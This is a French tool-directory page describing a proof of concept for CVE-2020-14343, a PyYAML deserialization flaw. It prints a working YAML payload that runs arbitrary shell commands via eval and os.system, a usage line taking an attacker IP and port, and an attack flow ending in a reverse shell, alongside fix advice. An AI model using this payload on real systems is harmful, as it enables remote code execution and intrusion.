Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-14343-PyYAML — CVE-2020-14343的payload | Kitploit
Outils/GitHubGitHub/kairo-one/cve-2020-14343-pyyaml
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubkairo-one/cve-2020-14343-pyyaml

CVE-2020-14343-PyYAML

CVE-2020-14343的payload

Voir le dépôt
2il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-14343 PyYAML — POC de la vulnérabilité de désérialisation

Aperçu de la vulnérabilité

Télécharger l’outil
ÉlémentInformation
Numéro CVECVE-2020-14343
Composant affectéPyYAML < 5.4
Type de vulnérabilitéExécution de code à distance par désérialisation (RCE)
Niveau de gravitéÉlevé

Principe de la vulnérabilité

Lorsque PyYAML utilise yaml.load() pour analyser des données non fiables, il ne limite pas les balises YAML dangereuses (telles que !!python/object). Un attaquant peut alors construire un contenu YAML malveillant afin d'exécuter du code Python arbitraire.

Partie centrale du payload :

root@kitploit:~
!!python/object/new:tuple
  - !!python/object/new:map
    - !!python/name:eval
    - ["__import__('os').system('command')"]

Utilisation

root@kitploit:~
python poc.py <目标URL> <攻击者IP> <监听端口>

Exemple :

root@kitploit:~
python poc.py http://vulnerable-site.com 192.168.1.100 4444

Déroulement de l'attaque

  1. Le script démarre un écouteur TCP en local
  2. Il téléverse le fichier YAML malveillant sur le point d'accès /upload de la cible
  3. Il déclenche le point d'accès /login pour charger et analyser le YAML
  4. Le serveur cible exécute le payload et renvoie un shell à l'attaquant

Installation des dépendances

root@kitploit:~
pip install requests

Avis de non-responsabilité

⚠️ Cet outil est destiné uniquement à la recherche en sécurité et aux tests autorisés !

  • Ne pas l'utiliser à des fins illégales
  • S'assurer d'avoir obtenu l'autorisation du système cible avant toute utilisation
  • L'auteur n'est pas responsable de toute utilisation abusive

Recommandations de correctifs

  1. Utiliser yaml.safe_load() au lieu de yaml.load()
  2. Mettre à niveau PyYAML vers la version 5.4 ou ultérieure
  3. Valider strictement les entrées utilisateur

Liens de référence

  • CVE-2020-14343 - NVD
  • Documentation officielle de PyYAML